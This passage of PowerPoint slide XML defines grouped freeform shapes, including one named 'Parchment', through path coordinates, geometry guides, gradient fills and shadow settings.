                <a:ext cx="665" cy="346"/>
                <a:chOff x="3730" y="1806"/>
                <a:chExt cx="534" cy="278"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="74" name="Group 8"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3734" y="1875"/>
                  <a:ext cx="530" cy="209"/>
                  <a:chOff x="3826" y="1959"/>
                  <a:chExt cx="530" cy="209"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="78" name="Freeform 9"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="3982" y="2000"/>
                    <a:ext cx="374" cy="168"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 374"/>
                      <a:gd name="T1" fmla="*/ 0 h 176"/>
                      <a:gd name="T2" fmla="*/ 136 w 374"/>
                      <a:gd name="T3" fmla="*/ 0 h 176"/>
                      <a:gd name="T4" fmla="*/ 199 w 374"/>
                      <a:gd name="T5" fmla="*/ 15 h 176"/>
                      <a:gd name="T6" fmla="*/ 278 w 374"/>
                      <a:gd name="T7" fmla="*/ 64 h 176"/>
                      <a:gd name="T8" fmla="*/ 290 w 374"/>
                      <a:gd name="T9" fmla="*/ 74 h 176"/>
                      <a:gd name="T10" fmla="*/ 281 w 374"/>
                      <a:gd name="T11" fmla="*/ 92 h 176"/>
                      <a:gd name="T12" fmla="*/ 264 w 374"/>
                      <a:gd name="T13" fmla="*/ 100 h 176"/>
                      <a:gd name="T14" fmla="*/ 238 w 374"/>
                      <a:gd name="T15" fmla="*/ 96 h 176"/>
                      <a:gd name="T16" fmla="*/ 206 w 374"/>
                      <a:gd name="T17" fmla="*/ 84 h 176"/>
                      <a:gd name="T18" fmla="*/ 180 w 374"/>
                      <a:gd name="T19" fmla="*/ 68 h 176"/>
                      <a:gd name="T20" fmla="*/ 178 w 374"/>
                      <a:gd name="T21" fmla="*/ 70 h 176"/>
                      <a:gd name="T22" fmla="*/ 230 w 374"/>
                      <a:gd name="T23" fmla="*/ 102 h 176"/>
                      <a:gd name="T24" fmla="*/ 274 w 374"/>
                      <a:gd name="T25" fmla="*/ 110 h 176"/>
                      <a:gd name="T26" fmla="*/ 320 w 374"/>
                      <a:gd name="T27" fmla="*/ 110 h 176"/>
                      <a:gd name="T28" fmla="*/ 354 w 374"/>
                      <a:gd name="T29" fmla="*/ 100 h 176"/>
                      <a:gd name="T30" fmla="*/ 374 w 374"/>
                      <a:gd name="T31" fmla="*/ 106 h 176"/>
                      <a:gd name="T32" fmla="*/ 374 w 374"/>
                      <a:gd name="T33" fmla="*/ 128 h 176"/>
                      <a:gd name="T34" fmla="*/ 362 w 374"/>
                      <a:gd name="T35" fmla="*/ 150 h 176"/>
                      <a:gd name="T36" fmla="*/ 336 w 374"/>
                      <a:gd name="T37" fmla="*/ 164 h 176"/>
                      <a:gd name="T38" fmla="*/ 306 w 374"/>
                      <a:gd name="T39" fmla="*/ 174 h 176"/>
                      <a:gd name="T40" fmla="*/ 130 w 374"/>
                      <a:gd name="T41" fmla="*/ 176 h 176"/>
                      <a:gd name="T42" fmla="*/ 104 w 374"/>
                      <a:gd name="T43" fmla="*/ 158 h 176"/>
                      <a:gd name="T44" fmla="*/ 74 w 374"/>
                      <a:gd name="T45" fmla="*/ 146 h 176"/>
                      <a:gd name="T46" fmla="*/ 46 w 374"/>
                      <a:gd name="T47" fmla="*/ 126 h 176"/>
                      <a:gd name="T48" fmla="*/ 26 w 374"/>
                      <a:gd name="T49" fmla="*/ 110 h 176"/>
                      <a:gd name="T50" fmla="*/ 2 w 374"/>
                      <a:gd name="T51" fmla="*/ 110 h 176"/>
                      <a:gd name="T52" fmla="*/ 0 w 374"/>
                      <a:gd name="T53" fmla="*/ 0 h 17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374"/>
                      <a:gd name="T82" fmla="*/ 0 h 176"/>
                      <a:gd name="T83" fmla="*/ 374 w 374"/>
                      <a:gd name="T84" fmla="*/ 176 h 176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374" h="176">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="136" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="199" y="15"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="278" y="64"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="290" y="74"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="281" y="92"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="264" y="100"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="238" y="96"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="206" y="84"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="180" y="68"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="178" y="70"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="230" y="102"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="274" y="110"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="320" y="110"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="354" y="100"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="374" y="106"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="374" y="128"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="362" y="150"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="336" y="164"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="306" y="174"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="130" y="176"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="104" y="158"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="74" y="146"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="46" y="126"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="26" y="110"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="2" y="1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63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79" name="Freeform 10"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="3826" y="1959"/>
                    <a:ext cx="163" cy="168"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 240"/>
                      <a:gd name="T1" fmla="*/ 0 h 348"/>
                      <a:gd name="T2" fmla="*/ 0 w 240"/>
                      <a:gd name="T3" fmla="*/ 348 h 348"/>
                      <a:gd name="T4" fmla="*/ 240 w 240"/>
                      <a:gd name="T5" fmla="*/ 348 h 348"/>
                      <a:gd name="T6" fmla="*/ 240 w 240"/>
                      <a:gd name="T7" fmla="*/ 87 h 348"/>
                      <a:gd name="T8" fmla="*/ 207 w 240"/>
                      <a:gd name="T9" fmla="*/ 0 h 348"/>
                      <a:gd name="T10" fmla="*/ 0 w 240"/>
                      <a:gd name="T11" fmla="*/ 0 h 34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240"/>
                      <a:gd name="T19" fmla="*/ 0 h 348"/>
                      <a:gd name="T20" fmla="*/ 240 w 240"/>
                      <a:gd name="T21" fmla="*/ 348 h 34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240" h="348">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="348"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="348"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="87"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="20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635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</p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="75" name="Freeform 11"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3886" y="1904"/>
                  <a:ext cx="374" cy="168"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 374"/>
                    <a:gd name="T1" fmla="*/ 0 h 176"/>
                    <a:gd name="T2" fmla="*/ 136 w 374"/>
                    <a:gd name="T3" fmla="*/ 0 h 176"/>
                    <a:gd name="T4" fmla="*/ 199 w 374"/>
                    <a:gd name="T5" fmla="*/ 15 h 176"/>
                    <a:gd name="T6" fmla="*/ 278 w 374"/>
                    <a:gd name="T7" fmla="*/ 64 h 176"/>
                    <a:gd name="T8" fmla="*/ 290 w 374"/>
                    <a:gd name="T9" fmla="*/ 74 h 176"/>
                    <a:gd name="T10" fmla="*/ 281 w 374"/>
                    <a:gd name="T11" fmla="*/ 92 h 176"/>
                    <a:gd name="T12" fmla="*/ 264 w 374"/>
                    <a:gd name="T13" fmla="*/ 100 h 176"/>
                    <a:gd name="T14" fmla="*/ 238 w 374"/>
                    <a:gd name="T15" fmla="*/ 96 h 176"/>
                    <a:gd name="T16" fmla="*/ 206 w 374"/>
                    <a:gd name="T17" fmla="*/ 84 h 176"/>
                    <a:gd name="T18" fmla="*/ 180 w 374"/>
                    <a:gd name="T19" fmla="*/ 68 h 176"/>
                    <a:gd name="T20" fmla="*/ 178 w 374"/>
                    <a:gd name="T21" fmla="*/ 70 h 176"/>
                    <a:gd name="T22" fmla="*/ 230 w 374"/>
                    <a:gd name="T23" fmla="*/ 102 h 176"/>
                    <a:gd name="T24" fmla="*/ 274 w 374"/>
                    <a:gd name="T25" fmla="*/ 110 h 176"/>
                    <a:gd name="T26" fmla="*/ 320 w 374"/>
                    <a:gd name="T27" fmla="*/ 110 h 176"/>
                    <a:gd name="T28" fmla="*/ 354 w 374"/>
                    <a:gd name="T29" fmla="*/ 100 h 176"/>
                    <a:gd name="T30" fmla="*/ 374 w 374"/>
                    <a:gd name="T31" fmla="*/ 106 h 176"/>
                    <a:gd name="T32" fmla="*/ 374 w 374"/>
                    <a:gd name="T33" fmla="*/ 128 h 176"/>
                    <a:gd name="T34" fmla="*/ 362 w 374"/>
                    <a:gd name="T35" fmla="*/ 150 h 176"/>
                    <a:gd name="T36" fmla="*/ 336 w 374"/>
                    <a:gd name="T37" fmla="*/ 164 h 176"/>
                    <a:gd name="T38" fmla="*/ 306 w 374"/>
                    <a:gd name="T39" fmla="*/ 174 h 176"/>
                    <a:gd name="T40" fmla="*/ 130 w 374"/>
                    <a:gd name="T41" fmla="*/ 176 h 176"/>
                    <a:gd name="T42" fmla="*/ 104 w 374"/>
                    <a:gd name="T43" fmla="*/ 158 h 176"/>
                    <a:gd name="T44" fmla="*/ 74 w 374"/>
                    <a:gd name="T45" fmla="*/ 146 h 176"/>
                    <a:gd name="T46" fmla="*/ 46 w 374"/>
                    <a:gd name="T47" fmla="*/ 126 h 176"/>
                    <a:gd name="T48" fmla="*/ 26 w 374"/>
                    <a:gd name="T49" fmla="*/ 110 h 176"/>
                    <a:gd name="T50" fmla="*/ 2 w 374"/>
                    <a:gd name="T51" fmla="*/ 110 h 176"/>
                    <a:gd name="T52" fmla="*/ 0 w 374"/>
                    <a:gd name="T53" fmla="*/ 0 h 17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74"/>
                    <a:gd name="T82" fmla="*/ 0 h 176"/>
                    <a:gd name="T83" fmla="*/ 374 w 374"/>
                    <a:gd name="T84" fmla="*/ 176 h 17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74" h="176">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="136" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="199" y="15"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="278" y="64"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="290" y="74"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="281" y="92"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="264" y="100"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="238" y="96"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="206" y="84"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="180" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="178" y="70"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="230" y="102"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="274" y="110"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="320" y="110"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="354" y="100"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="374" y="106"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="374" y="128"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="362" y="150"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="164"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="306" y="174"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="130" y="176"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="104" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="74" y="146"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="46" y="126"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="26" y="110"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="1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/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="C0C0C0"/>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="rect">
                    <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
                  </a:path>
                </a:gra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tIns="27432" bIns="27432" anchor="ctr">
                  <a:spAutoFit/>
                </a:bodyPr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76" name="Freeform 12"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3730" y="1863"/>
                  <a:ext cx="163" cy="168"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 240"/>
                    <a:gd name="T1" fmla="*/ 0 h 348"/>
                    <a:gd name="T2" fmla="*/ 0 w 240"/>
                    <a:gd name="T3" fmla="*/ 348 h 348"/>
                    <a:gd name="T4" fmla="*/ 240 w 240"/>
                    <a:gd name="T5" fmla="*/ 348 h 348"/>
                    <a:gd name="T6" fmla="*/ 240 w 240"/>
                    <a:gd name="T7" fmla="*/ 87 h 348"/>
                    <a:gd name="T8" fmla="*/ 207 w 240"/>
                    <a:gd name="T9" fmla="*/ 0 h 348"/>
                    <a:gd name="T10" fmla="*/ 0 w 240"/>
                    <a:gd name="T11" fmla="*/ 0 h 34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40"/>
                    <a:gd name="T19" fmla="*/ 0 h 348"/>
                    <a:gd name="T20" fmla="*/ 240 w 240"/>
                    <a:gd name="T21" fmla="*/ 348 h 34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40" h="348">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="348"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="348"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="87"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20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8B8BFF"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="0000FF"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="1"/>
                </a:gra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tIns="27432" bIns="27432" anchor="ctr">
                  <a:spAutoFit/>
                </a:bodyPr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77" name="Freeform 13"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3736" y="1806"/>
                  <a:ext cx="149" cy="168"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 219"/>
                    <a:gd name="T1" fmla="*/ 0 h 103"/>
                    <a:gd name="T2" fmla="*/ 0 w 219"/>
                    <a:gd name="T3" fmla="*/ 103 h 103"/>
                    <a:gd name="T4" fmla="*/ 219 w 219"/>
                    <a:gd name="T5" fmla="*/ 103 h 103"/>
                    <a:gd name="T6" fmla="*/ 219 w 219"/>
                    <a:gd name="T7" fmla="*/ 78 h 103"/>
                    <a:gd name="T8" fmla="*/ 186 w 219"/>
                    <a:gd name="T9" fmla="*/ 1 h 103"/>
                    <a:gd name="T10" fmla="*/ 0 w 219"/>
                    <a:gd name="T11" fmla="*/ 0 h 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19"/>
                    <a:gd name="T19" fmla="*/ 0 h 103"/>
                    <a:gd name="T20" fmla="*/ 219 w 219"/>
                    <a:gd name="T21" fmla="*/ 103 h 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9" h="103">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="103"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="219" y="103"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="219" y="78"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="186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FFFFFF"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="0000F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tIns="27432" bIns="27432" anchor="ctr">
                  <a:spAutoFit/>
                </a:bodyPr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</p:grpSp>
        </p:grp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470" y="646"/>
              <a:ext cx="1813" cy="1419"/>
              <a:chOff x="470" y="646"/>
              <a:chExt cx="1813" cy="1419"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25" name="Rectangle 15" descr="Parchment"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="470" y="786"/>
                <a:ext cx="1627" cy="1268"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:pr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>
                <a:outerShdw dist="53882" dir="2700000" algn="ctr" rotWithShape="0">
                  <a:srgbClr val="C0C0C0"/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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="26" name="Group 16"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1098" y="1811"/>
                <a:ext cx="744" cy="254"/>
                <a:chOff x="1585" y="1694"/>
                <a:chExt cx="638" cy="218"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="64" name="Freeform 17"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1585" y="1732"/>
                  <a:ext cx="100" cy="180"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 872 w 872"/>
                    <a:gd name="T1" fmla="*/ 178 h 366"/>
                    <a:gd name="T2" fmla="*/ 872 w 872"/>
                    <a:gd name="T3" fmla="*/ 246 h 366"/>
                    <a:gd name="T4" fmla="*/ 682 w 872"/>
                    <a:gd name="T5" fmla="*/ 366 h 366"/>
                    <a:gd name="T6" fmla="*/ 0 w 872"/>
                    <a:gd name="T7" fmla="*/ 170 h 366"/>
                    <a:gd name="T8" fmla="*/ 0 w 872"/>
                    <a:gd name="T9" fmla="*/ 142 h 366"/>
                    <a:gd name="T10" fmla="*/ 230 w 872"/>
                    <a:gd name="T11" fmla="*/ 0 h 366"/>
                    <a:gd name="T12" fmla="*/ 872 w 872"/>
                    <a:gd name="T13" fmla="*/ 178 h 36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72"/>
                    <a:gd name="T22" fmla="*/ 0 h 366"/>
                    <a:gd name="T23" fmla="*/ 872 w 872"/>
                    <a:gd name="T24" fmla="*/ 366 h 36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72" h="366">
                      <a:moveTo>
                        <a:pt x="872" y="178"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="872" y="246"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="682" y="366"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="170"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="142"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="230" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="872" y="17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B2B2B2"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="E5E5E5"/>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="rect">
                    <a:fillToRect l="100000" t="100000"/>
                  </a:path>
                </a:gradFill>
                <a:ln w="317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tIns="27432" bIns="27432" anchor="ctr">
                  <a:spAutoFit/>
                </a:bodyPr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65" name="Freeform 18"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1596" y="1721"/>
                  <a:ext cx="100" cy="179"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 848 w 848"/>
                    <a:gd name="T1" fmla="*/ 174 h 324"/>
                    <a:gd name="T2" fmla="*/ 216 w 848"/>
                    <a:gd name="T3" fmla="*/ 0 h 324"/>
                    <a:gd name="T4" fmla="*/ 0 w 848"/>
                    <a:gd name="T5" fmla="*/ 134 h 324"/>
                    <a:gd name="T6" fmla="*/ 666 w 848"/>
                    <a:gd name="T7" fmla="*/ 324 h 324"/>
                    <a:gd name="T8" fmla="*/ 848 w 848"/>
                    <a:gd name="T9" fmla="*/ 174 h 3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48"/>
                    <a:gd name="T16" fmla="*/ 0 h 324"/>
                    <a:gd name="T17" fmla="*/ 848 w 848"/>
                    <a:gd name="T18" fmla="*/ 324 h 3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48" h="324">
                      <a:moveTo>
                        <a:pt x="848" y="174"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="216" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="134"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="666" y="324"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="848" y="17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17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tIns="27432" bIns="27432" anchor="ctr">
                  <a:spAutoFit/>
                </a:bodyPr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66" name="Freeform 19"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1766" y="1694"/>
                  <a:ext cx="388" cy="112"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 477"/>
                    <a:gd name="T1" fmla="*/ 12 h 138"/>
                    <a:gd name="T2" fmla="*/ 456 w 477"/>
                    <a:gd name="T3" fmla="*/ 138 h 138"/>
                    <a:gd name="T4" fmla="*/ 477 w 477"/>
                    <a:gd name="T5" fmla="*/ 125 h 138"/>
                    <a:gd name="T6" fmla="*/ 20 w 477"/>
                    <a:gd name="T7" fmla="*/ 0 h 13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77"/>
                    <a:gd name="T13" fmla="*/ 0 h 138"/>
                    <a:gd name="T14" fmla="*/ 477 w 477"/>
                    <a:gd name="T15" fmla="*/ 138 h 13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77" h="138">
                      <a:moveTo>
                        <a:pt x="0" y="12"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="456" y="138"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="477" y="125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67" name="Freeform 20"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1654" y="1717"/>
                  <a:ext cx="404" cy="143"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 496"/>
                    <a:gd name="T1" fmla="*/ 66 h 177"/>
                    <a:gd name="T2" fmla="*/ 21 w 496"/>
                    <a:gd name="T3" fmla="*/ 73 h 177"/>
                    <a:gd name="T4" fmla="*/ 45 w 496"/>
                    <a:gd name="T5" fmla="*/ 61 h 177"/>
                    <a:gd name="T6" fmla="*/ 60 w 496"/>
                    <a:gd name="T7" fmla="*/ 66 h 177"/>
                    <a:gd name="T8" fmla="*/ 45 w 496"/>
                    <a:gd name="T9" fmla="*/ 80 h 177"/>
                    <a:gd name="T10" fmla="*/ 344 w 496"/>
                    <a:gd name="T11" fmla="*/ 163 h 177"/>
                    <a:gd name="T12" fmla="*/ 360 w 496"/>
                    <a:gd name="T13" fmla="*/ 151 h 177"/>
                    <a:gd name="T14" fmla="*/ 386 w 496"/>
                    <a:gd name="T15" fmla="*/ 158 h 177"/>
                    <a:gd name="T16" fmla="*/ 370 w 496"/>
                    <a:gd name="T17" fmla="*/ 170 h 177"/>
                    <a:gd name="T18" fmla="*/ 396 w 496"/>
                    <a:gd name="T19" fmla="*/ 177 h 177"/>
                    <a:gd name="T20" fmla="*/ 496 w 496"/>
                    <a:gd name="T21" fmla="*/ 106 h 177"/>
                    <a:gd name="T22" fmla="*/ 111 w 496"/>
                    <a:gd name="T23" fmla="*/ 0 h 17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96"/>
                    <a:gd name="T37" fmla="*/ 0 h 177"/>
                    <a:gd name="T38" fmla="*/ 496 w 496"/>
                    <a:gd name="T39" fmla="*/ 177 h 17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96" h="177">
                      <a:moveTo>
                        <a:pt x="0" y="66"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="21" y="73"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="45" y="61"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="60" y="66"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="45" y="80"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="344" y="163"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="360" y="151"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="386" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="370" y="170"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="396" y="177"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="496" y="106"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="111" y="0"/>
                      </a:lnTo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68" name="Freeform 21"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2044" y="1810"/>
                  <a:ext cx="88" cy="35"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 40 w 108"/>
                    <a:gd name="T1" fmla="*/ 0 h 44"/>
                    <a:gd name="T2" fmla="*/ 107 w 108"/>
                    <a:gd name="T3" fmla="*/ 17 h 44"/>
                    <a:gd name="T4" fmla="*/ 69 w 108"/>
                    <a:gd name="T5" fmla="*/ 43 h 44"/>
                    <a:gd name="T6" fmla="*/ 0 w 108"/>
                    <a:gd name="T7" fmla="*/ 25 h 44"/>
                    <a:gd name="T8" fmla="*/ 40 w 108"/>
                    <a:gd name="T9" fmla="*/ 0 h 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8"/>
                    <a:gd name="T16" fmla="*/ 0 h 44"/>
                    <a:gd name="T17" fmla="*/ 108 w 108"/>
                    <a:gd name="T18" fmla="*/ 44 h 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8" h="44">
                      <a:moveTo>
                        <a:pt x="40" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="107" y="17"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="69" y="43"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="25"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="40" y="0"/>
                      </a:lnTo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69" name="Freeform 22"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1994" y="1848"/>
                  <a:ext cx="79" cy="34"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 21 w 97"/>
                    <a:gd name="T1" fmla="*/ 7 h 42"/>
                    <a:gd name="T2" fmla="*/ 46 w 97"/>
                    <a:gd name="T3" fmla="*/ 11 h 42"/>
                    <a:gd name="T4" fmla="*/ 60 w 97"/>
                    <a:gd name="T5" fmla="*/ 0 h 42"/>
                    <a:gd name="T6" fmla="*/ 84 w 97"/>
                    <a:gd name="T7" fmla="*/ 8 h 42"/>
                    <a:gd name="T8" fmla="*/ 72 w 97"/>
                    <a:gd name="T9" fmla="*/ 19 h 42"/>
                    <a:gd name="T10" fmla="*/ 96 w 97"/>
                    <a:gd name="T11" fmla="*/ 25 h 42"/>
                    <a:gd name="T12" fmla="*/ 77 w 97"/>
